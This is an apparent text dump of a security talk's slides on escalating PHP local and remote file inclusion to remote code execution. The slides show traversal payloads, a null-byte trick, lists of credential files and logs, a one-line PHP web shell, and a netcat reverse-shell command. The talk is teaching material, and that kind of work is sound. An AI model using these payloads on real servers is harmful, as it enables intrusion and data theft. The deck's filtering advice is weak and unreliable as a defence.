lfi to rce

Journey From LFI to RCE

-G.Manideep

@mani0x00

#Who am I?

Member at #nullhyd

Pursuing B.tech 4th year

Jack of all,Master of none!

Interested in Information Security

#What is I’m gonna talk?

LFI

RFI 10%

RCE

And …. Demo’s ;) − 90%

#What you need to know?

Cd .. (how to change directories :p )

Netcat

Little knowledge on Php

Ssh

Let’s Go!!!

#Disclaimer

#Local File Inclusion

Local File Inclusion is the process of including files on

a server through the web browser. This vulnerability

occurs when a page include is not properly sanitized,

and allows directory traversal characters to be injected.

<?php

$page=$_GET[“page”];

include($_GET[“$page”]); Vulnerable !!

?>


What if the attacker assigns page to be

"../../../../etc/passwd". It causes the attacker to read a

content from /etc/passwd.

Vulnerable Function’s leads to LFI -include()

-include_once()

-require()

-require_once()

-fopen()

#Finding Vul Functions

Make Mistakes! :D


<?php

if($_GET[“page”]) {

$file = preg_replace(‘/\x00.*/’, “” ,$file);

include($file);

}

?>

o In This Case we may use terminator’s(%00) to execute LFI

Eg: ?page=../../../../../../../../var/log/auth.log%00


Some Directories to verify LFI.

etc/passwd

/etc/shadow

/etc/group

/etc/security/passwd

/etc/security/user

/etc/security/environ

/etc/security/limits

Database Configuration

i.e: config.inc.php

#Remote File Inclusion

RFI stands for Remote File Inclusion that allows the attacker to upload a custom coded/malicious file on a website or server. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using JavaScript).

<?php

$file ="http://Somesite/c99.php?"; //$_GET['page'];

include($file .".php"); //include (http://Somesite/C99.php?.php)

?>

#Prevention

Do not permit appending file paths directly.

Use str_replace(‘../’, ‘ ’, $_GET[‘file’]);

If you definitely need dynamic path concatenation,

ensure you only accept required characters such as "a-Z

0-9" and do not allow ".." or "/" or "%00" (null byte) or

any other similar unexpected characters.

#Demo On LFI&RFI

#Remember

Finding

o Exploitation

#Exploitation

Verifying RCE with phpinfo()

Verifying the hack by ping our machine.

Getting a Shell

#Remote Code Execution

The Process of executing own script’s on the Web Server Remotely is called “Remote Code Execution”.

#Verifying the Hack

Let’s Ping ourself!

#Shell Time

Include a malicious php code

<?php exec($_GET[‘cmd’]); ?>

Let’s make a GET request

…..&cmd=nc <ip> <port> -e /bin/bash

#Log Locations

../apache/logs/error.log

../apache/logs/access.log

../etc/httpd/logs/acces_log

../usr/local/apache/logs/access. Log

../var/log/apache2/error_log

../var/www/logs/error_log

#Thanks!

lfi to rce

Internet